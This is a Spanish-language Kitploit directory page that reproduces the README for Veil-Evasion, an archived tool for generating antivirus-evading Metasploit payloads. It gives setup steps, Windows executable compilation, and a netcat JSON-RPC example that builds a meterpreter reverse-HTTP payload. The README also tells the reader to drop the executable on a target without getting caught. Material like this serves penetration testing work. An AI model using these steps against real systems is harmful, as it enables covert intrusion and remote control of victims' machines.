Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Veil-Evasion — Veil Evasion ya no recibe soporte, ¡usa Veil 3.0! | Kitploit
Herramientas/GitHubGitHub/veil-framework/veil-evasion
Frameworks de ExploitsGeneración de PayloadsPruebas de PenetraciónComando y ControlGeneración de ShellcodeArchived
GitHubveil-framework/veil-evasion

Veil-Evasion

Veil Evasion ya no recibe soporte, ¡usa Veil 3.0!

Ver Repositorio
1.8k67522hace 5 añosRevisado por Kitploit
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Veil-Evasion

Veil-Evasion es una herramienta diseñada para generar payloads de Metasploit que evaden las soluciones antivirus comunes.

NOTA: ./setup/setup.sh debe ejecutarse de nuevo en cada actualización de versión importante. Si recibes errores importantes al ejecutar Veil-Evasion, primero intenta volver a ejecutar este script para instalar paquetes adicionales y actualizar el archivo de configuración común.

Veil-Evasion actualmente cuenta con soporte activo por parte de @ChrisTruncer, @TheMightyShiv, @HarmJ0y.

Agradecimientos a:

  • @jasonjfrank
  • @mjmaley
  • @davidpmcguire

Requisitos de Software:

Linux

  1. Usa Kali (x86) y todas las dependencias están preinstaladas

o

  1. Instala Python 2.7
  2. Instala PyCrypto >= 2.3

Windows (para compilación con Py2Exe)

  1. Python (probado con x86 - http://www.python.org/download/releases/2.7/)
  2. Py2Exe (http://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/)
  3. PyCrypto (http://www.voidspace.org.uk/python/modules.shtml)
  4. PyWin32 (http://sourceforge.net/projects/pywin32/files/pywin32/Build%20218/pywin32-218.win32-py2.7.exe/download)

Configuración (tl;dr)

NOTA: La instalación debe realizarse con privilegios de superusuario. Si no estás usando Kali Linux, antepone sudo a cada comando o cambia al usuario root antes de comenzar.

Ejecuta setup.sh -c en Kali x86.

Instala Python 2.7, Py2Exe, PyCrypto y PyWin32 en una computadora con Windows (para Py2Exe).

Instalación Rápida

apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c

Regenerar Configuración

NOTA: Esto debe hacerse con privilegios de superusuario. Si no estás usando Kali Linux, antepone sudo a cada comando o cambia al usuario root antes de comenzar.

La mayoría de las veces el archivo de configuración en /etc/veil/settings.py no necesitará ser reconstruido, pero en algunos casos podrías ser solicitado a hacerlo. El archivo es generado por config/update.py.

Es importante que estés en el directorio config/ antes de ejecutar update.py. Si no es así, settings.py será incorrecto y al iniciar Veil-Evasion verás lo siguiente.

    Menú Principal

            0 payloads cargados

No entres en pánico. Entra en el directorio config/ y vuelve a ejecutar update.py.

Descripción

Veil-Evasion fue diseñado para ejecutarse en Kali Linux, pero debería funcionar en cualquier sistema capaz de ejecutar scripts de Python. Simplemente llama a Veil-Evasion desde la línea de comandos y sigue el menú para generar un payload. Al crear el payload, Veil-Evasion preguntará si deseas que el archivo del payload se convierta en un ejecutable mediante PyInstaller o Py2Exe.

Si usas PyInstaller, Veil-Evasion convertirá tu payload en un ejecutable dentro de Kali.

Si usas Py2Exe, Veil-Evasion creará tres archivos:

  • payload.py - El archivo del payload
  • setup.py - Archivo requerido para Py2Exe
  • runme.bat - Script por lotes para compilar el payload en un ejecutable de Windows

Mueve los tres archivos a tu máquina Windows con Python instalado. Los tres archivos deben colocarse en la raíz del directorio donde se instaló Python (probablemente C:\Python27). Ejecuta el script por lotes para convertir el script de Python en un formato ejecutable.

Coloca el archivo ejecutable en tu máquina objetivo por cualquier medio necesario y ¡no te dejes atrapar!

Servidor RPC

En el lado del listener, ejecuta:

./Veil-Evasion --rpc

Esto iniciará un listener en el puerto 4242.

En el lado del cliente, necesitarás ejecutar un programa cliente. Puede ser un script personalizado o algo tan simple como Netcat. El servidor RPC implementa JSON-RPC. Esta es una buena referencia para interpretar solicitudes y respuestas de JSON-RPC: http://json-rpc.org/wiki/specification

El formato de solicitud RPC es el siguiente:

    method="version"            -   devuelve el número de versión actual de Veil-Evasion
    method="payloads"           -   devuelve todos los payloads cargados actualmente
    method="payload_options"
        params="payload_name"   -   devuelve las opciones para el payload especificado
    method="generate"
        params=["payload=X",   
                "outputbase=Y"
                "overwrite=Z",
                "msfvenom=...",
                "LHOST=blah]     -   genera el payload especificado con las opciones dadas y devuelve la ruta del ejecutable generado

Este es un ejemplo simple de trabajo con Veil-Evasion usando Netcat:

root@kali:~# nc 127.0.0.1 4242
{"method":"version","params":[],"id":0}

Y la respuesta del servidor:

{"id":0,"result":"2.21.4","error":null}

Un ejemplo de un programa cliente se puede encontrar aquí: http://github.com/miligulmohar/python-symmetric-jsonrpc/blob/master/examples/client.py

NOTA: El puerto para Veil-Evasion es 4242. Esto debe cambiarse en client.py para que funcione.

Para generar un payload, TODOS los parámetros deben incluirse:

  • payload - qué payload generar
  • outputbase - el nombre para guardar el payload
  • LHOST - la dirección IP del host de escucha
  • LPORT - el puerto del host de escucha
  • pwnstaller - True para empaquetar programas de Python en un ejecutable. False si no. Ignorado para otros payloads

Esta es una buena referencia para entender si se usa o no pwnstaller: http://www.verisgroup.com/blog/2014/05/07/pwnstaller-and-the-veil-framework/

Un ejemplo de generación de un payload:

root@kali:~# nc 127.0.0.1 4242
{"method":"generate","params":["payload=c/meterpreter/rev_http","outputbase=payloadName","LHOST=192.168.1.11","LPORT=2121","pwnstaller=False"],"id":1"}

Y la respuesta del servidor:

{"id":8,"result":"/usr/share/veil-output/compiled/payloadName.exe","error":null}

NOTA: Si no se especifica ningún id en la solicitud, Veil-Evasion se cerrará. Dicho esto, puedes hacer tantas solicitudes válidas como desees hasta que Veil-Evasion se cierre.

Para cerrar el servidor RPC ejecuta:

./Veil-Evasion --rpcshutdown

Descargar herramienta